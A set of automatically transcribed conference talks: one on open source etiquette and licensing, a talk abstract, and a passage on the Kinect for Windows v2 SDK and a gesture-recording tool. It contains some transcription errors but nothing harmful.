Especially when people who don't have English as a first language will then translate, you know, mistranslations are easy to happen. It's, yeah, everything's hard. So you can have conversations that spiral out of control until you have this sort of the famous words, take it offline. I've heard that so many times as a consultant. It's silly. But everyone has sort of a writing style and the more I've done sort of GitHub and get a related work, I've kind of got more aware of my style. So I'm going to give you an example of my style. This was a one line fix for a project around the build scripts. So rather than sort of just leave no comments, I decided to explain what was going on, how I'd messed up and throwing a gift for good measure. Like I was, that's kind of, people who know me will know that I happily mock myself and that's no different to what I was doing. Another thing that the GitHub guys use a lot internally is emoji. It's a silly little thing but after being there for like almost a year, I can't live without emoji. We have our own little internal lingo around communications. Start off the day by dropping into the chat room and sending in a wave emoji to say hi. You could say hi but we kind of drop it into say a picture. If you agree with something, you could do a thumbs up. We also use okay and to say goodbye at the end of that, you know, peace out. We have these little lingo that we kind of just grow up. Code related stuff, we use lipstick to kind of indicate that this change is sort of like a refactoring rather than actually changing any behavior. This is a warning to don't touch this code yet. It's not ready and of course fire is for deleting code because deleting code is awesome. Gifts again, we do use a lot. This is someone who shall remain nameless. Was merging someone's code, dropped into GIF with a thumbs up and yeah, Darth Punk. But of course, words quite often will turn around. This was something that happened last Christmas. I was playing around with script CS and I was grumpy. I was at the point where things were just breaking and rather than actually submit an issue, I just got on Twitter. I see in all the maintainers, I gave them a screenshot and yeah, I was just basically grumpy ass. Thankfully, this one turned out because Glenn, one of the maintainers wanted an excuse to get back into script CS. So he jumped point me to the issue tracker. We chatted back and forth on what should happen and I think he fixed up in about 24 hours which is insane but not so surprising for Glenn. This example here from TetherModdy, he was looking at a poor question that had been seen there for a while and someone jumped up and got angry. This was his reply. In particular, he just wanted to remind everyone in that discussion that people in open source come from all walks of life and of course, everyone has their own, their first open source PR. So just yeah, be constructive, be positive, work with the guy. Great way to disarm that discussion. Legal stuff. Code that, I'm just going to use that as an example. So this is a gist from a colleague. He was writing a read or write a log. Yes, it was. In objective C. He actually put a code header up to indicate the legal details. The gist that I put up yesterday for something else I realized did not have a header. If you don't put a header on a code file, the ownership of that code is actually to the guy who wrote it. So you're not allowed to use it unless you get their permission. Most developers don't really understand the copyright stuff aside from yo, this is a license. How you are allowed to use code that's out there on the internet is very, very important. And of course, everyone's probably seen this in copyright software. It's just a note to say, go and read the damn license because it's really important. I'm going to tell you a little anecdote. The LibGit2 project, which is a Microsoft and GitHub co-sponsored project, is licensed in GPLv2. There's a C-sharp wrapper on top of that, which is actually MIT licensed. Now, these two are incompatible, things that are licensed under GPL. If you consume them, you have to adopt the same license. But how do these people get away with using the MIT license? That's a shortcut, which I'll explain in a second. The LibGit2 project was licensed under GPL2 with a linker exception. Now what the hell does this linker exception mean? It's these little words in the file. You can link to the compiled version of the project or take the source code and use the license. The LibGit2 project is GPLv2, but it's also permissive for those who just want to use the bits. Get to know the licenses of the projects that are out there. If there's stuff you're using already and you don't know the license, just go and check. Typically, MIT, BSD, Apache licenses, they're fairly permissive and open with what you need. Just go and check, please. All right, friction. So lots of people will happily put code out there that does something and they will assume that everyone knows how to set it up. They know what things they need to build, what things they need to test with. They just assume that people will figure it out for themselves. I say no. I say that's terrible. I say you should make it as easy as possible for me to hack on your stuff. So things like I consider friction are, oh, you know, I have a certain version of Visual Studio. Is it 2010? Is it 2012? Is it 2013? I don't know. So my challenge to you guys who work on stuff is to take a fresh dev environment and test out a project. Doesn't even have to be yours. Take some time to kind of see how easy it is for someone else to work on this project. Are there additional tools that are necessary? Are there config files, configuration values that are missing? Does stuff just not work? An example of that I did recently was for XUnit. I saw that they were on GitHub. I pulled down the repo. I went to build it and it would fail to build because the package was missing. So I basically asked an issue, raised an issue to say where is this mystery package? They said, oh, it's over on this new feed. I turned that into a new get config. I pushed up a pull request and actually got merged in but it was re-based off to a different commit. That was a little thing that I could do to make it easier for people to get started with XUnit. I did something similar with Autofac. Their docs were in this old HTML format. I turned it into markdown so that people could just get started with it. Little things like that kind of make everyone's life easy. Passion. So as someone who has done a lot of open source projects, this guy, Zach Holman, he sent out the suite a while ago, I kept it favorited, open source is totally a love hate thing. You live to see yourself die a happy guy or you just get jaded. That sucks. Everyone should be happy. That's one of the ideals I've got. I'm going to tell you about a couple of projects where I've completely lost the passion on and how this thing happened. Ultimately, I haven't gone back to them yet but what I might do. So the first one is Squirrel. So we had this grand idea to replace click once with our own update, install experience built on Wix. I got through to, we had a goal of 1.0 of doing all this stuff and I got through to 0.8 where we started documenting the extensibility points. And then I hit this KB article that I needed. So we're in.NET 4 and to do.NET 4 in a single way, you need a specific KB installed. There is no way for you to be able to install this KB without having to restart the user machine which is a not great experience. I wanted to kind of work around this one. I ended up going back to the guys at Microsoft and they said, sorry. So I was at this point where I had an installer that was not a great experience. Yes, it did most of the stuff and I just kind of lost the urge to kind of keep pushing this thing on. So back in January, I wrote up a lovely markdown file of this is the headaches that I'm dealing with, this is what I'm going to suggest to do and ultimately I got a lot of positive feedback around doing it. But then my priorities changed internally and so I didn't get enough time to spend on it. I do feel really sad about not coming back to it. But yeah, that's I guess how things go. The other project came out of, I was up for MVP summit and there was some guy who said documentation in.NET projects is terrible. So I had this burst of inspiration. Thank you, James. And started hacking on this little thing called Scribble. The goal for this one here is to kind of make documentation easy to work on. Actually, I want to show you something. It was just PowerShell scripts plugged into NuGet. You install it in your project and then you kind of generate docs inside your IDE. What I wanted to do with this project here was on build, refresh your docs. If you had code snippets, you could pull them into the project, pull them into the documentation. But the problem was that there was any hooks that were available to do this. So I was left with throwing away the PowerShell and NuGet stuff and rewriting it as a VSIX if you've ever done VSIX. You'll know that it's not for the faint of heart. And I got to this point where I just said, yeah, no, I'm not doing this. Some people have kind of pulled in various bits and pieces for other things, but at the moment it's just sitting there. Someone that was asking me the last time I gave this talk, what's a good example of kind of wrapping up a project? Announcing that, yes, I'm done. Thanks for all the fish and off you go. Jeremy Miller had actually just wrapped up his development on Fubi MVC at that time and I said, yeah, that's the one that I've got. The cool things that he did, all classy things that's called that, was that he gave enough notice. He was working on some tasks and he said, after I've done these tasks, it's going to be 2.0 and then that's it. And so he also gave reasons about why he believed he was giving that stuff up. And yeah, it was a rather impressive way. I've got the link to that in the slide notes. I'll publish that up later. But yeah, so you kind of just got to be honest with yourself to say, that's enough. I'm going to kind of call it there. Oh, done versus dead. The before I'd done open source work, I really haven't thought about this distinction between done versus dead. I'm building out stuff for what I need, other people are using this stuff for what they need. There's going to be some sort of impasse between impasse impedance mismatch. So you'll see discussions like this. The contributor says, it does what I need to do. I consider it done. The other people will turn around and just say, I want to support new features, blah, blah, blah, blah. An interesting example of this is underscore. So underscore had some sort of changes they wanted to target performance. Someone else wanted to come in and support browser compatibility. They got to the point where low dash came in and basically forked the project to go in their different direction. People are going to go back and forth about this stuff, but ultimately they don't have to agree. If you've got enough motivation and interest around going in a different direction, just do it. But the fact that it's nice to have one source of truth for these projects, but quite often that won't be the case. The other sort of side of this stuff is when projects are abandoned, they can't get the maintainer to come in and look at stuff. Thankfully things like GitHub will let you kind of fork off a project super easily and you'll quite often have projects that get abandoned. A blog post from Felix Geissendorf came up a while ago around this thing called a pull request hack. He mentioned this radical concept of when someone submits a pull request that gets merged in, give them commit access. At the time, this was my reaction because I thought this guy is on drugs. Why would you open it up to basically be a free for all? But it's a bit more nuanced than that. You've got people contributing stuff to your project. Why not empower them to keep doing that stuff? I've seen this, I've actually done this on a couple of projects in a second, but you have these people who are competent enough to get code in. Why not just let them do it? So one of these projects, I inherited a WPF UI application after the original maintainer didn't want to take it over, but at the time I was doing web development. And I was just like, I have no time or passion to maintain this stuff. But there were a few people in there who were commenting on pull requests. So I fired them off an email and I said, to thank you guys for all the hard work that you've done in my absence. I'm giving you guys push rights for the project. I just said, I'm around if you guys want to have questions, ping me on Skype if you've got stuff, and then I just kind of stepped back. So these three guys, Alex, Dennis and Jan, they now run the thing. They have done a number of releases since if you saw Hanselman's project that he just launched, that's using Marbs Metro. The last thing I actually contributed to that project was some nice documentation. So again, it's all coming full cycle. You were on the core, let's write some docs, that's it. Sadly, I actually get pulled into this stuff a fair bit and I just had to tell Hanselman the last time this came up to mention that these guys here are working on the project, give them credit instead of me. So I'm running really early on here. The party's going on now. But yeah, so my ethos around this stuff is that we just need to be nice, so we need to be more constructive. We need to be more inclusive. Lots of people can do open source work. We should be doing more open source work because it's a more interesting model. Yeah, questions? I have Tim Tams, Australia's favourite sandwich. Getups, no, sandwich. My brain's gone, I'm sorry. Australia's favourite biscuits. Some getup stickers. Super scribe stickers as well. Yeah. Thanks for your time. Go enjoy the party. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
|
Over the past couple of years, Brendan has worked extensively with OSS projects and helped introduce new developers to this brave new world. In this talk he will demonstrate a practical guide to working in Open Source. Join him for real-world advice, based on the things he's seen succeed (and fail!). If you're looking to start your own OSS journey; or if you already do a little and would like to do more; you need to catch this talk.
|
10.5446/50790 (DOI)
|
It has some weird name that you've never heard before and we'll quickly forget. So it's a tool that you can use to run against a website that has any kind of, takes a parameter you know that maps to an ID in a database. And.nirrocks.com used to, we used to publish, you know, where you could take a show ID and pass it in the primary key and all that stuff. And he said that's a prime vector for a SQL injection attack. I do my homework, right? I mean when, well I wrote the back end and I do not just, you know, take parameters, you know, just willy-nilly from input and stuff it into a SQL string. There's no way I do that. Everything's parameterized. I check to make sure that it's, you know, that it's a number, all that stuff. So he says basically with this tool you just run it against that URL and it comes back and it goes, does its thing. And it comes back in about five minutes and says here are all your tables, here's all your data, here's your password and stuff. And I'm like, Troy Hunt, right? Scary man. So, so Richard and he have this conversation. I'm like, downloaded. So that's why I got that malicious, potentially malicious software because it, you know, it doesn't like that. Maybe because it came in a jar file. I don't know. But I ran it and in 15 minutes I was relieved to find that it, nope, it couldn't get through. Yeah. I actually did it right. But still Windows thinks it's a potentially harmful file. I'll probably uninstall it. This is the, let's find it. It's probably right here if I refresh it. Yeah. Havage. Havage. That's it. Don't need it anymore. So, now I won't get that message. But that's what it was. All right. It's 420. You ready? So, I'm going to start with a story. Story started about an hour ago. I was in the booth. I brought this Kinect prototype for the Kinect version 2 that I got from Microsoft. I'm an MVP for Kinect for Windows. So I was part of the early developer preview program before they opened it up to non-MVPs. I got this last year. And so, you know, coming to show you all how it works. So I'm testing it out about an hour ago. Plug it in. Poof! Oh, my God. What was that? 120 volts. So there won't be a demo today. Sorry. True story. So, and it's a Japanese switching power supply. They just went to the extra effort to limit it to 120 to 120. 220 to 120. They decided, nope, they're going to have two versions, one for Europeans and one for Americans. So I can't, maybe because of my license, right? I don't know. Thank you, Microsoft, for ruining my demo. So, but it's not ruined. I have a lot of information to share. I have some good videos to show that I've made myself of software that I've written that I'm also going to share with you. So it's going to be a good session. So first of all, the Kinect for Windows 2, this guy right here, is based on the Xbox sensor, but this prototype here has this nasty breakout box that will not be the finished product. You know, it has USB 3 on one side, power on the other side, and another connector on the other side to the breakout box from the power supply. And the final version, of course, will look a lot nicer. They just announced pricing and availability. Did you notice this? $299, well about $1,700. So it's currently cheaper in the Microsoft Store than the first version. First version is $299, $299, US dollars, and this is $199. And you can pre-order it now. There it is. MSDN blogs, pre-order your Kinect for Windows V2 sensor starting today. And here's the actual pre-order page. And it's in the Microsoft Store. You can order it now. So what they're going to do is they're going to ship these at the end of July, looks like, or sometime in July, and they will also ship with a beta version of the SDK. And the SDK will continue to be developed. This is a slideshow that was NDA from the early, this is a PDF from a slideshow that they showed us a long time ago. It's all since been released as public information, but the PDF itself doesn't exist for the public. So I wanted to just go through it a little bit, and I'm going to scroll rather quickly just so that if you see anything that you're really interested in, we'll go page by page, give you a chance to say, whoa, and ask a question. I don't want to gloss over anything. Then again, we got a lot of info to talk about. So this sensor has a camera that's 1080p. It does 30 frames a second. It has a depth NIR stream as well, and those that feeds the skeleton or the body different from the color. It has a very wide range, a lot wider view, and it can recognize up to six bodies at once unlike the previous one. This is not very interesting. Also not very interesting. Yeah, here you go. So skeleton is what we used to call the body, but I think we really need to talk about these different modes here before we get into any of these features. Yeah, here we go. These are the data sources. Some of these are currently implemented, some are not. Audio is not. Infrared is, color is, depth, body and body insects, index is, audio is not, but it will be. So infrared is the first sort of level. Like an infrared camera, you get that infrared stream. That's kind of cool. You get a color camera, 30 frames a second, as I said. You get depth. So depth is, if you've ever seen those posterized, weird looking, you know, either, they're monochrome, essentially, images that basically show an outline of you, you know, or a depth perception of you. That's what is used by the SDK to build up an image internally of where the different joints are in the body. And then that body is presented as a collection of joints, 20 joints around, you know, your head, your neck, your shoulders, and your arms and your legs and all that. And it maps those in real time. And so as you move, you've seen the videos where you've overseen a skeletal stick figure drawn over the body. And so it can map you in three dimensions in real time, at 30 frames a second. The audio thing, I won't talk about too much, but the whole promise of the audio is because it has a microphone array. It can tell you who's talking, which body is actually speaking when it's listening, because it can see, right? And it knows that based on where in the audio spectrum, that in the stereo spectrum, that signal is the strongest, therefore it came from that person. So that's kind of cool. So it can differentiate between this person issuing a command and that person issuing a command. It's kind of neat. Not implemented yet, but it will be. Infrared, I don't have any experience with this, but the way that you access the data in all of these streams is pretty much the same. But again, I don't have a lot of experience with this. The way that you do it is you grab the sensor and you open a reader, and then there's a frame arrived event, and this pretty much happens for all of the sources. And at that frame arrived event, you get a frame and in it the data. So here's just a little C-sharp code that shows you what it might look like to handle a frame of infrared data. You acquire the frame, and if it's not null, you copy it to an array, and you can do what you want with the data. There you go. All right. So there's calm implementation as well. Here, interesting. I've had a lot of experience with this. Being able to save the frame to a bitmap or a JPEG file and stay out of the way asynchronously was a challenge, but I finally figured out how to do it. But it is easy enough to do. You get basically a raw buffer, and you can turn that into a writable bitmap. Of course, you can bind that to an image. So viewing that in real time in WPF anyway is very easy and trivial. Here's how to access that raw format data if you want to. There's lots of great samples that come with the SDK that show you how to do this. But again, it's the same idea. You get a reader, you acquire the frame in the event that handles the frame, and then you copy it to an array. You can then write it to a writable bitmap, which is then bound to an image source, which is shown. And that's exactly what they're doing right there, writing it to a writable bitmap. So depth is two bytes per pixel. It's basically what is used to figure out where your person is and where all the different joints are in your body. And this is the real thing here, is the body tracking. Very, very cool. You get six bodies, which in the previous version you can only get data for two of them at once. So that's really neat. You also get the state of the hands, whether they're open, closed, or pointing. So open, closed, or pointing. It can tell the difference between those, but it can't tell, for example, what fingers are moving. It doesn't have finger resolution yet. If you are one of those people who likes to do signal processing, digital signal processing, and image processing, you could look at the depth data, which has all of the information about the fingers, and you could do your own and see if you can do that. And there are a lot of people doing that, but the SDK itself does not have finger recognition. But this is interesting, too. They have things that will tell you about the appearance. In the level of user engagement, if you're looking at the connector, if you're looking away, that's neat. And also, a couple of facial expressions, whether you're smiling or whether you're neutral, whether you're grumpy, they can tell that. In the previous version of the SDK, and will definitely be ported to this new one, they have a whole face recognition API. And so they map something like 83 or 85 or 80-something points on your face. And with that, just like the skeleton can identify the joints of your body, they can map these points. With that, you can get this data map of a person's face and see, as they're making weird expressions, you can use that to animate avatars, or you can use it to identify people or different faces or whatever. There's a lot easier ways to do facial recognition, though, than that. But it's kind of neat. And I can't wait to see what they do with it in this version. You also get the direction, the orientation of joints, which way they're leaning. And that's kind of cool, which way they're pointing. So here's how that works. And I love this little bug there, infrared data equals body frame source. But it's just like the infrared initialization. You create a buffer, an array of bodies, which is going to be six. And then you create a body reader. And you have a frame arrived event. And you acquire the frame. And this is basically one method to copy the frame's data to a buffer, to the buffer. It just does it in one shot, which is nice. And there's a bunch of stuff here. Here are all the joints. So nothing spectacularly strange there. You do get the hand tip and the thumb, the hand, and the wrist. So there's quite a bit of fidelity around the hand, because that's where most people do gesture recognition. Yeah? All that processing of putting the joints, is that how I'm working, like, connecting itself or in the machine? So this is a great question. It's handled in the GPU. Yeah, it's handled in the GPU of the machine. So previously, in the old version of the sensor, it was handled by the machine in the CPU. But since it's the SDK running on the machine, not in the connect itself, it has to run on the machine somewhere. But this version runs in the GPU. Yeah? So that's a good question. There is code available that lets you run C-sharp in the GPU. So that's worth looking into. I don't have an official answer on that, though. But seeing as how you can run C-sharp code in the GPU, yeah, I don't see why not. I mean, it's just data. If you can get that data into a format, into a generic format, which it is, it's essentially just double precision numbers. Right, I mean, it's essentially just an array of doubles. You copy that into an array, send it off to the GPU, do some processing with it. Yeah, sure. I can see that happening. You have the state of being tracked and not tracked and inferred for any joint. And so that there are different pens that you can use, for example, to draw, you know, bones or whatever. There's some great software that just comes with it in WPF that allows you to, you know, draw a skeleton. I've done some simplification of all of that stuff, and I'll share that code with you. But here's just a nice little abstraction. So if the body is tracked, go through all the joints and get the rotation of joint orientations for each position and map that to a camera space. So camera space is video. This is just a way to map what the body's coordinates are to the video coordinates. So if you want to overlay one on the other, the hand states also have a confidence, which is nice. But there's only two, high and low. It's been nice to have a number, but we don't have that. These expressions are not implemented yet, but it is kind of funny how they, how this will be in the final SDK. You know, it'll know if your eyes are open or closed, your mouth is open. If you're looking away or wearing glasses, just these kinds of neat little things. Again, not implemented yet, but will be. Here's the engaged in leaning. And audio, again, not yet implemented. I told you about that. All right. So let's, yeah, frame synchronization. Let's talk about this. So there's a color reader. There's a body reader. There's an infrared reader and all that. There's also a multi-source frame reader. And this is the way that you can synchronize more than one of these readers together. If you want to display, for example, a skeleton over a video, you need to use a multi-source frame reader. And that will allow you to get the frames at the same time in a synchronized way. So let me just show you some code. Let me show you what that looks like. This is a simplification that I've done. Can you see that? Okay. It looks pretty big, doesn't it? You can see that fine. All right. Good. So this is, again, a simplification that I've done. A nice little wrapper for all of this stuff that handles both body and, bodies and images. And it has stuff for joint thickness and pens for the hand, you know, brushes, hand-open brush, a hand lasso brush, a brush for the joints when they're tracked, when they're not tracked, when they're inferred, when a bone is tracked and when it's not. This head image is neat if you basically take a PNG file or even a JPEG file, but a PNG file has transparency of somebody's head. And you put it in there, you know, when it'll put the picture where the head is. So I do a great demo where I have John Skeet's head over my body when I'm walking around. It's kind of funny, you know, and it tips when you move your head. But I wish I could didn't blow up that thing. I couldn't demo it anyway. But anyway, video image source is what you can bind an image to in WPF. Right here we've got a video image bound to video image source. And in a grid, and then over that we've got, you know, in the same grid cell, right, with a border transparent, we've got an image source, a body image bound to the image source property, which is for the body. All right, so here we go. When we initialize this, looking for the default connect sensor. And this is the great thing about this API. And I asked the question, has it, have any of you used the connect for Windows API before? The answer was no. But in previous versions, like if it wasn't plugged in, there were errors and stuff. And, you know, if the service wasn't running and all that stuff. But none of that, it just doesn't care now. If there's no sensor plugged in, it doesn't go nuts. It doesn't freak out. It just returns no. And you can just code around it. Like there's no exceptions thrown, no problem. Like it's not a null object. It's just that the connect sensor is going to be null. So if we have a sensor plugged in, we're getting a coordinate mapper, we're opening the sensor, we get this frame description. And that gives us the width and height of the frame. And from that, we can get a color frame description. The depth frame is for the body. The color frame is for the color. And then we're opening a multi-source frame reader right here, where we're passing in that we want both the body and the color stream in one reader. This pixels is an array of bytes that's going to store the color data for each frame. And then I'm creating a writable bitmap here. This is a property, a writable bitmap with the width and the height. And I have my array of bodies. And I start initializing. I call an event that my status has changed. And I initialize each body. Now this joint smoothing here is something that I'm privy to because I'm an MVP. I don't know if it's going to be in the SDK. I imagine it will be. But it's the joint smoothing algorithm that the team has. Sometimes right out of the box you'll be moving and it will be tracking you. And your knee will be here. And if you move it down here, all of a sudden you boing, boing, boing, boing, boing, boing, this kind of stuff. So smoothing just makes it go a little bit slower, but it doesn't freak out. It knows that in frame 500 you were here. In frame 501 it was over here. In frame 502 it was back here. You know what? In frame 101 it was probably right there. So it does that smoothing for you. So then we have our frame arrived. Let's go down here. Multisource frame arrived. And I get my color frame and I get my body frame. And I just have a different processing thing for each one of them. So the color frame. I just have some, a show live video if I want to do that. I have a display color frame which basically copies the data to an array and writes it into the bitmap. And this is my code to write into a JPEG using await. Save it to a JPEG file. And let's go to process body frame. Whatever that is. Here it is. So this one's a little more, takes a little bit more work. So I have this, I'm drawing a transparent background to set the render size which is something that I stole right out of the sample code. In fact, a lot of this was stolen right out of the sample code. And I have a boolean that I want to draw bodies or not. Getting refreshed the data for the bodies, all of them. And then I go through each one of these. Now we have joints in the joint type and we're smoothing those and that's all this is. Then mapping them into camera points and calling draw body. And this is what that code looks like. Calls to draw bone, you know, which draws from the head to the neck, from the neck to the shoulder, from the shoulder to the spine. Essentially, that's what this is. You have a drawing context that you're drawing for each of these things. Alright, so long story short, it's kind of complex if you're doing all this stuff by yourself. So this particular engine that I wrote simplifies all of that to this. That's it. So look at this code here. This is my grid with an image bound to video image source, an image bound to image source over it. I've got a simple multi-engine here. This is my code. In my main window loaded, I've created a simple multi-engine. I got a body tracked event setting my data context and that in and of itself is enough to display the color, camera, and the body over it, done. And now if I want to look at any of those joints, I can look at them right here. Body, joints, and joint type, head, or hand left, position, X, Y, Z. That's it. So this is the same data that you would get in frame arrived except all of that other cruft is taken out of your way. So even if you're not using this, which my code is freely available on my blog, you can write your own abstraction layer just to handle all that stuff and get it out of the way of the app. Definitely a good idea. So when it comes down to time to writing your app and you want to know if somebody did this, you know, now you can just track the X position of the hand. I guess it's this hand over time. And if it was here and then it's here in a certain amount of time, now they've done that. But it gets even better. So for the first version of Connect for Windows, I wrote this program called Gesture Pack. And Gesture Pack is a recording app where you stand and perform a gesture, and it records the movements that you make and saves that data to an XML file. And then you load up those XML files at runtime and say, watch me. And then when you perform any of those gestures at Fires and Event, it tells you you did it. Because I don't want to be tracking joints, you know? And who knows, where do I start? How do I know what a hand wave is? Where do I start? Where is it? How, you know? So here's the first version, which is for the old version of Connect for Windows. This is the demo video that I have for that. And this is exactly how you use it. Create new. Snapshot. So you're taking snapshots of positions of where your hands are or whatever. Animate. Stop animation. Next. So now I'm using the force to name it. Turns out there's a lot easier ways to do this than I had originally thought, but I thought this was kind of fun at first. I always wanted to use a keyboard to the force. Next. So next. The axis to track, X and Y, not Z. Left hand. So you're picking the joints that you want to track. Left hand, right hand. Test gestures. Now I'm going to test out that flap. Begin test. Flap. Flap. Flap. Right. Stop test. Salute. So I have another gesture I created. Begin test. Just to show you can have more than one. Flap. Salute. And now you move around. Flap. Salute. Stop test. Show you that it's previous. Create new. Create another gesture here. Snapshot. Turn mouse off. Snapshot. Snapshot. Snapshot. Snapshot. Next. Next. Wax on. Next. Next. Just the right hand. Test gestures. Now I'm testing them all. Wax on. Flap. Salute. Begin test. You can see I'm moving around so it's relative to the body. Not too much. Wax on. Wax on. Wax on. Wax on. Turn mouse off. Wax on. Wax on. Wax on. Wax on. So that was the old version and I thought it was a little bit clunky. So in this next version and believe me it's not going to look so bad but this was just the beta version that I had put out. I'm even going to turn off. I'll tell you how I'm going to improve it but let me just show you what a difference this interface makes. To record a gesture click the live mode button then the record gesture button. Step back say start recording. The button turns red. Perform the gesture then say OK stop. Then save the gesture to an XML file. Just name it here. We're naming it Wax on. And now you're in edit mode. So press the animate button. So record all those frames and cycle through them. You can see there's 104 frames here. It's quite a lot especially at the end. So let's trim them up a little bit. I'm using the mouse wheel to scrub through all of the frames here. So let's get to the first ish frame in the animation. Around 24 and click the trim start button. And now the animation starts at 24. So now let's get about to the end of the animation. Click trim end. Now we only have 29 frames in the animation. A little easier to work with. All right so now let's pick the joints we want to track. As you can see when I hover over the joints you see the names of the joints up the top there. I only want the right hand in this gesture. So click on it to turn white. You can also see that I can pick X, Y and Z axis to track individually. And the left and right hand state open, closed. For this gesture I only want X and Y. Okay now we pick the frames that we want to match against. So scrub to the frames and one by one click the match button. So you want to pick the lowest number of frames necessary, the smallest number of frames necessary in order to make this gesture work. And therein lies the art of creating gestures. Just picking those frames. Okay so it's going to match those frames in real time in series. That max duration right there, 500 milliseconds. That's how much time you get from frame to frame. Before it gives up and says up you're no longer in the running. Okay let's test it. Click the live mode button again, stand back, do the gesture and match. Okay now we're playing a wave file but you can do anything. And in fact it's very easy to just make a call to check to see if a gesture was made. Multiple bodies, multiple gestures and you get the source code with this next version of GesturePak. So you can just rock on all day long. Pretty simple huh? Alright so there you go. So that's a bit different isn't it from using speech and all that. But even in this one I'm not going to require speech because speech, people have problems with it, it doesn't recognize your accent or whatever. Your microphone isn't turned up you know. And it's not necessary I found out. You can basically set a number of seconds that you want it to record for. And then just you know say start recording and then it'll count down and give you five seconds to get in place. And then it'll just say go. And you do the gesture whatever it is you're going to do. Maybe you set ten seconds so it gives you ten seconds worth of you know recording. And then it says you're done. And then you can go and trim it up and do whatever you want. So the data itself looks like, I'll show you what the data looks like. Here's a, yeah here's WaxOn right here. It's just a gesture with, it's an XML file with all the little data things that I'm, all the joints that I'm tracking in here. And each frame with the duration, Max and Min, the left and the right hand state. And then each joint the X, Y and Z value. Very easy. Each frame has a name, frame one, frame two, whatever, whether it's being matched or not. So it's very easy to understand, very easy to edit. It just seems to me like a very natural thing. So I was selling this for 99 bucks. The next version I've decided to open source it. Yeah. Along with the connect tools that are right here on my CarlFranklin.net. You can download right now. This is connect tools. It's an abstraction that I was showing you. It simplifies all of this stuff here, takes all of that code and turns it into just a couple of lines. You know, so that you can easily track positions and do, do stuff. And it also does the drawing of the body, you know, and it, and gives you full options in terms of the pens and the brushes and what you want. How, you know, how thick you want the lines to be and all that stuff. So questions? I suppose the idea of gesture pack is that you report the gestures and then you use them later in your applications. Yeah. Yeah. Yeah, use them later in your applications. Basically you have a couple of things. You've got a, you actually have a recorder object in gesture pack as well. So if you want to load up a recorder and say record start, you can record your own gestures. And, and once you've stopped that, you can save that as a, as an XML file. It just has right, you know, you can record your own, write your own code to record it. You don't have to use the interface that I'm providing. And then you can load those up in a, in a, in a list. Basically you create a list of gestures and create a match or object. And you tell it to start recognizing. And then in your body tracked, you know, or whatever, you take this, this body right here, which could be any one of six. This will fire each, you know, six times if you have six bodies for each frame. And you pass that to the gesture matcher and say, you know, this is the latest data I have was a gesture matched. And because it keeps, keeps track of the match or keeps track of all that stuff. I will show you the code if you'd like to see it. The gesture matcher is a really interesting code. So the first thing that I do is I make all of the X, Y, and Z coordinates relative to the spine, the spine mid, because this is essentially you. It does, you know, when you move around, the coordinates that you get are all in meters and they're all relative to the connect. So if I, if I've got my right hand here and I'm moving like this, it's changing. The right hand is changing. So, and it's for obvious reasons, it's relative to the connect. So, but if you want to make it relative to the body, then you just have to subtract hand from body, body to hand, whatever it is, subtract it. And so that's the first thing I do. And then I'm looking through each joint in the frame, making sure we're tracking because we, we're only interested in the joints that we're tracking. Remember in the gesture, I can say I only want to track the right hand or the left hand or both. And then the whole idea is to not pay attention to the, to the noise and only focus in on the things that matter. So if it's just the right hand, great. And only the axes that we're tracking, X, Y, or Z. If it's just, you know, you might have a gesture that's just like this, you know, stop. To stop something. You might have a game that, you know, the children are crossing the road and the cars are zooming by and you stop. But you might go like that. You might go like this. You might go like that. Doesn't matter if my Z is out, you know, is at this distance from my chest. That's all I really care about. I don't care about how high it is or what, how left or right it is, you know. So I'm all, I would only track Z. Yeah. Yeah. So, yeah. So that's a, that's a good question. Remember, it's relative to the spine. So the spine has a Z as well. Yeah. Your spine mid wherever that is, you know, right here. So, so if we're tracking X, Y, or Z, then we're, we look at the delta, which is the difference between. Where the joint is now and where it is in the frame, the next frame that I have to match in the gesture. And if it's within that window, and that was, if you remember, in, in this guy, let's back him up a little. This, I don't know if we said this, but in the fudge factor field right there, this is the sort of margin of error that, it's sort of a, think of it as a bubble around which you have some give. And if that fudge factor is too big, you're going to have more false positives. If it's too small, you won't, you won't trigger it. You know, you won't trigger it enough. You'll have to be more accurate. Right. So it's kind of important to get that right. And I think that's a good fudge factor. And how I came to that value, how I come to that value is by taking the deltas between the X, Y, and Z, or all of the, all of the axes that I'm tracking, and taking the deltas and adding them together and comparing to the fudge factor. Yeah. And so then, I'm checking to see if we're, if the hand states match as well as the fudge factor, and of course this is going to return true if we're not tracking the hands. And the frame matches. Great. Set a matched property on the frame. Cool. Now I have whether these frames are matched or not. Then I go through each gesture. And now that the frames are matched, I want to see if the frames have been matched in the right sequence and within the time window. So it's really a brute force method of just going through the data and determining whether or not you've gone through the positions in the right amount of time in an accurate way. Right. It's actually fairly simple. What's missing from this is scale. So if I make a gesture, and I'm like this, and my gesture is put your hands out like this, and I'm tracking Y, right? I'm tracking Y. And then somebody like this comes in and does like this. It's not going to work. So that code is missing. And that's what I'm hoping. And I actually have some that kind of works, but this is one of the reasons why I'm open sourcing it. That's sort of like beyond my mathematical ability to figure out. So that's one of the reasons I want to open source to make, to let somebody else do that. What else can I tell you? Questions? Any other questions? What's that? What is the raw data? The raw what data? Video data? Yeah. The raw video data can be in a bunch of different formats. Let's see. Color, color, color, color, color, color, color, color, color, color, color, color, color, color, color, color, color. Yes. Yeah. This has been my experience. It's been in this YUY2 format. But you can't never tell. You can't count on it. You basically have to query the frame to determine what format it's in and treat it appropriately. I'm not a format person. I don't know what these things are. You know, RGBA is obviously red, green, blue, alpha. So that's the order of bytes. But YUY2, I don't even know what that stands for. I just know that's the format. And then there's a method that you can call to copy from that format into a buffer that can go into be digested by a writable bitmap. Yeah. Cool. What do you like? What do you not like? Thoughts? Yeah. What is the position of the movement detection? Is it possible, for example, to type on a keyboard on a centimeter scale, like a virtual keyboard? You mean a very close range? Very close range, I'm not sure. You know, a lot depends on the lighting. And I wouldn't say typing, but I never rule it out. I don't know. I couldn't tell you. You saw me before where I had, I was standing about 10 meters away and doing this and moving very little, you know, and actually moving the mouse. And that all had to do with, I mean, it's very sensitive, actually, if you're moving. It's very sensitive in how much it changes. I mean, you know, it has meter, you know, it's in meters, but you're getting a double precision number. So it's tracking really, really small movements. So I imagine that you could, you know, have that kind of control if you really wanted it. You know anything about sign language recognition? Here's what I know. Not with this, because this is brand new, but I was involved in a gesture recognition competition in Boston. I believe it was in Boston, yeah. And I don't know why I was there, because my method was like so pedestrian compared to everyone else who was just like, you know, these Asian kids math geniuses that were talking about forests and map reduction and stuff. And I was like here with my C sharp code doing, you know, brute force array integer decimal comparisons and stuff. It was 